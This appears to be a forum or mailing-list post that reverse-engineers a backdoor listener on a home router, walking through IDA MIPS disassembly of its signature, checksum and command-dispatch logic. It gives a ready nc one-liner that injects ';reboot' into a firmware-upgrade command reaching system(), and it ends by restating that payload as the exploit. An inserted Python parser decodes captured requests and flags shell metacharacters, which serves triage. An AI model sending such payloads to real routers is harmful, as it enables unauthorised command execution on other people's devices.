SOHO routers being hyped to the point of silly IDA workshops, I mean come on, really?
That stuff is basically kindergarten level of the 90s.
If you want some cheap street cred, here goes after 20 minutes of looking at my home router. Feel free to blog or make a YouTube video about it:

```sh
echo "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00" | nc router 31727
```

(port 31727, see http://seclists.org/nmap-dev/2013/q2/426)
```asm
.text:004011CC move $a0, $s2
.text:004011D0 beq $v0, $s4, loc_4010BC
.text:004011D4 addiu $a2, $fp, 0xD8+var_30
.text:004011D8 la $t9, accept
.text:004011DC nop
.text:004011E0 jalr $t9 ; accept
.text:004011E4 nop
.text:004011E8 lw $gp, 0xD8+var_C8($fp)
.text:004011EC move $s1, $v0
.text:004011F0 move $a3, $zero
.text:004011F4 move $a1, $s3
.text:004011F8 move $a0, $s1
.text:004011FC beq $s1, $s4, loc_4012AC
.text:00401200 li $a2, 0x5DC
.text:00401204 la $t9, recv
.text:00401208 nop
.text:0040120C jalr $t9 ; recv
.text:00401210 nop
```
User name is 8 bytes, "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2":

```asm
.rodata:00403820 COMM_SIGN: .byte 0xC6 # DATA XREF: dispatch:loc_4014E0o
.rodata:00403820 # send_ack+3Co ...
.rodata:00403821 .byte 0x52 # R
.rodata:00403822 .byte 0x46 # F
.rodata:00403823 .byte 0x31 # 1
.rodata:00403824 .byte 0xC8 # + # DATA XREF: send_ack+64r
.rodata:00403825 .byte 0x9C # £
.rodata:00403826 .byte 0xC4 # -
.rodata:00403827 .byte 0xE2 # G

.text:004014E0 # ---------------------------------------------------------------------------
.text:004014E0
.text:004014E0 loc_4014E0: # CODE XREF: dispatch+30j
.text:004014E0 la $a1, COMM_SIGN
.text:004014E4 move $a0, $s0
.text:004014E8 li $a2, 8
.text:004014EC la $t9, memcmp
.text:004014F0 nop
.text:004014F4 jalr $t9 ; memcmp
.text:004014F8 nop
.text:004014FC lw $gp, 0x30+var_20($sp)
.text:00401500 beqz $v0, loc_40151C
.text:00401504 nop
.text:00401508 la $a0, 0x400000
.text:0040150C nop
.text:00401510 addiu $a0, (aSignatureMisma - 0x400000) # "signature mismatch!!\n"
.text:00401514 b loc_4015F8
.text:00401518 nop
```
Password is a tricky beast:
First, pass \0 in buf[9] to deal with this wtf:

```asm
.text:0040151C # ---------------------------------------------------------------------------
.text:0040151C
.text:0040151C loc_40151C: # CODE XREF: dispatch+88j
.text:0040151C lbu $v0, 9($s0)
.text:00401520 nop
.text:00401524 beqz $v0, loc_401554
.text:00401528 li $a0, 0xFF
.text:0040152C lbu $v1, 0xB($s0)
.text:00401530 nop
.text:00401534 addu $v0, $v1
.text:00401538 beq $v0, $a0, loc_401554
.text:0040153C nop
.text:00401540 la $a0, 0x400000
.text:00401544 nop
.text:00401548 addiu $a0, (aIsnTRequestCom - 0x400000) # "Isn't REQUEST command or checksum erro"...
.text:0040154C b loc_4015F8
.text:00401550 nop
```
after which buf[0x8] and buf[0xa] must sum to 0xff:

```asm
.text:00401554 loc_401554: # CODE XREF: dispatch+ACj
.text:00401554 # dispatch+C0j
.text:00401554 lbu $a1, 8($s0)
.text:00401558 lbu $v0, 0xA($s0)
.text:0040155C li $v1, 0xFF
.text:00401560 addu $v0, $a1, $v0
.text:00401564 beq $v0, $v1, loc_401580
.text:00401568 nop
.text:0040156C la $a0, 0x400000
.text:00401570 nop
.text:00401574 addiu $a0, (aCommandChecksu - 0x400000) # "command checksum error!!\n"
.text:00401578 b loc_4015F8
.text:0040157C nop
```
Finally comes the command line: buf[0xc] = 0 for all intents and purposes, buf[0xd] is interpreted according to the _fdata table, and the function arguments start at buf[0xe]...

```asm
.text:00401580 loc_401580: # CODE XREF: dispatch+ECj
.text:00401580 la $a0, _fdata
.text:00401584 nop
.text:00401588 lbu $v0, (_fdata - 0x10000000)($a0)
.text:0040158C nop
.text:00401590 beqz $v0, loc_401640
.text:00401594 move $s1, $zero
.text:00401598 move $v1, $a0
.text:0040159C addiu $a3, $a0, (off_10000004 - 0x10000000)
.text:004015A0 move $a0, $zero
.text:004015A4 lbu $v0, (_fdata - 0x10000000)($v1)
.text:004015A8
.text:004015A8 loc_4015A8: # CODE XREF: dispatch+1A4j
.text:004015A8 addiu $a0, 8
.text:004015AC bne $v0, $a1, loc_401614
.text:004015B0 addiu $v1, 8
.text:004015B4 lbu $a2, 0xC($s0)
.text:004015B8 lbu $v0, 0xD($s0)
.text:004015BC sll $a2, 8
.text:004015C0 addu $v1, $s1, $a3
.text:004015C4 addu $a2, $v0
.text:004015C8 lw $v0, 0($v1)
.text:004015CC move $a0, $s2
.text:004015D0 addiu $a1, $s0, 0xE
.text:004015D4 move $t9, $v0
.text:004015D8 jalr $t9
.text:004015DC nop
.text:004015E0 lw $gp, 0x30+var_20($sp)
.text:004015E4 bgez $v0, loc_401624
.text:004015E8 nop
.text:004015EC la $a0, 0x400000
.text:004015F0 nop
.text:004015F4 addiu $a0, (aCallFunctionRe - 0x400000) # "call function return error!!\n"

.data:10000000 # Segment type: Pure data
.data:10000000 .data
.data:10000000 .globl _fdata
.data:10000000 _fdata: .word 1 # DATA XREF: dispatch:loc_401580o
.data:10000000 # dispatch+110r ...
.data:10000000 # Alternative name is '_fdata'
.data:10000000 # command
.data:10000004 off_10000004: .word get_info # DATA XREF: dispatch+124o
.data:10000008 .word 2
.data:1000000C .word write_id
.data:10000010 .word 4
.data:10000014 .word upgrade_fw
.data:10000018 .word 6
.data:1000001C .word set_domain
.data:10000020 .word 0
.data:10000024 .word 0
.data:10000028 .align 4
```
Of course, we'd like to update firmware:

```asm
.text:00401D94 .globl upgrade_fw
.text:00401D94 upgrade_fw: # DATA XREF: .data:10000014o
.text:00401D94 # .got:upgrade_fw_ptro
.text:00401D94
.text:00401D94 var_90 = -0x90
.text:00401D94 var_8C = -0x8C
.text:00401D94 var_88 = -0x88
.text:00401D94 var_80 = -0x80
.text:00401D94 var_78 = -0x78
.text:00401D94 var_10 = -0x10
.text:00401D94 var_C = -0xC
.text:00401D94 var_8 = -8
.text:00401D94 var_4 = -4
.text:00401D94
.text:00401D94 li $gp, 0xFC0629C
.text:00401D9C addu $gp, $t9
.text:00401DA0 addiu $sp, -0xA0
.text:00401DA4 sw $gp, 0xA0+var_80($sp)
.text:00401DA8 la $v0, 0x400000
.text:00401DAC nop
.text:00401DB0 addiu $v0, (aCommandIsUpgra - 0x400000) # "command is UPGRADE_FW\n"
.text:00401DB4 sw $s1, 0xA0+var_C($sp)
.text:00401DB8 sw $s0, 0xA0+var_10($sp)
.text:00401DBC move $s1, $a0
.text:00401DC0 move $s0, $a1
.text:00401DC4 move $a0, $v0
.text:00401DC8 sw $ra, 0xA0+var_4($sp)
.text:00401DCC sw $gp, 0xA0+var_8($sp)
.text:00401DD0 la $t9, printf
.text:00401DD4 nop
.text:00401DD8 jalr $t9 ; printf
.text:00401DDC nop
.text:00401DE0 lw $gp, 0xA0+var_80($sp)
.text:00401DE4 lbu $a2, 0($s0)
.text:00401DE8 lbu $a3, 1($s0)
.text:00401DEC lbu $v1, 3($s0)
.text:00401DF0 lbu $v0, 2($s0)
.text:00401DF4 addiu $a0, $sp, 0xA0+var_78
.text:00401DF8 la $a1, 0x400000
.text:00401DFC nop
.text:00401E00 addiu $a1, (aTftpGwGetD_D_D - 0x400000) # "tftp gw get %d.%d.%d.%d:/%s"
.text:00401E04 addiu $s0, 4
.text:00401E08 sw $s0, 0xA0+var_88($sp)
.text:00401E0C sw $v0, 0xA0+var_90($sp)
.text:00401E10 sw $v1, 0xA0+var_8C($sp)
.text:00401E14 la $t9, sprintf
.text:00401E18 nop
.text:00401E1C jalr $t9 ; sprintf
.text:00401E20 nop
.text:00401E24 lw $gp, 0xA0+var_80($sp)
.text:00401E28 addiu $a1, $sp, 0xA0+var_78
.text:00401E2C la $a0, 0x400000
.text:00401E30 nop
.text:00401E34 addiu $a0, (aUseCommandS - 0x400000) # "use command '%s'\n"
.text:00401E38 la $t9, printf
.text:00401E3C nop
.text:00401E40 jalr $t9 ; printf
.text:00401E44 nop
.text:00401E48 lw $gp, 0xA0+var_80($sp)
.text:00401E4C addiu $a0, $sp, 0xA0+var_78
.text:00401E50 la $t9, system
.text:00401E54 nop
.text:00401E58 jalr $t9 ; system
```
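Added example (not from the paste): a Python parser that replays the dispatch() checks above on a captured request and decodes the upgrade_fw arguments into the `tftp gw get %d.%d.%d.%d:/%s` line that reaches system(), flagging shell metacharacters in the %s part so a capture can be triaged. It keys the command on buf[8], because at 0x4015AC the table id byte is compared with $a1, which still holds buf[8] loaded at 0x401554, and passes buf[12..13] through as the handler's 16-bit third argument. Assumptions: a little-endian MIPS build (so the lbu of each .word id in _fdata reads the id itself) and a length guard that the firmware itself does not show; the sample packets in the checks are constructed.

```python
import re

# 8-byte request signature, COMM_SIGN at .rodata:00403820
COMM_SIGN = b"\xc6\x52\x46\x31\xc8\x9c\xc4\xe2"
# id -> handler, from the _fdata table at .data:10000000 (id word, pointer word)
FDATA = {1: "get_info", 2: "write_id", 4: "upgrade_fw", 6: "set_domain"}
# characters that let the %s part of "tftp gw get %d.%d.%d.%d:/%s" escape into the shell
SHELL_META = re.compile(rb"[;&|`$()<>\n]")


def decode_upgrade_fw(args):
    """upgrade_fw: args[0..3] -> %d.%d.%d.%d, args[4..] -> %s (NUL-terminated), then system()."""
    if len(args) < 5:
        return {"error": "upgrade_fw args too short"}
    host = ".".join(str(b) for b in args[:4])
    fname = args[4:].split(b"\0", 1)[0]
    return {
        "tftp_host": host,
        "filename": fname,
        "shell_cmd": "tftp gw get %s:/%s" % (host, fname.decode("latin-1")),
        "injection": SHELL_META.search(fname) is not None,
    }


def parse_request(buf):
    """Replay dispatch()'s checks on one received buffer; 'error' mirrors the firmware's messages."""
    if len(buf) < 14:                              # assumed guard, not in the listing
        return {"error": "short packet"}
    if buf[:8] != COMM_SIGN:                       # memcmp(buf, COMM_SIGN, 8) at 0x4014F4
        return {"error": "signature mismatch!!"}
    if buf[9] != 0 and buf[9] + buf[11] != 0xFF:   # loc_40151C
        return {"error": "Isn't REQUEST command or checksum error"}
    if buf[8] + buf[10] != 0xFF:                   # loc_401554
        return {"error": "command checksum error!!"}
    cmd = buf[8]          # at 0x4015AC the _fdata id byte is compared with $a1 = buf[8]
    handler = FDATA.get(cmd)
    if handler is None:
        return {"error": "unknown command", "cmd": cmd}
    result = {
        "cmd": cmd,
        "handler": handler,
        "arg_len": (buf[12] << 8) | buf[13],       # passed to the handler in $a2
        "args": buf[14:],                          # handler gets $a1 = &buf[0xe]
    }
    if handler == "upgrade_fw":
        result.update(decode_upgrade_fw(buf[14:]))
    return result
```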
Well, thank you. The final "exploit", or is it shellcode, would be something along the lines of "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00", but I didn't test it. I'm too lazy to ruin my OpenWrt on my BR-6104K.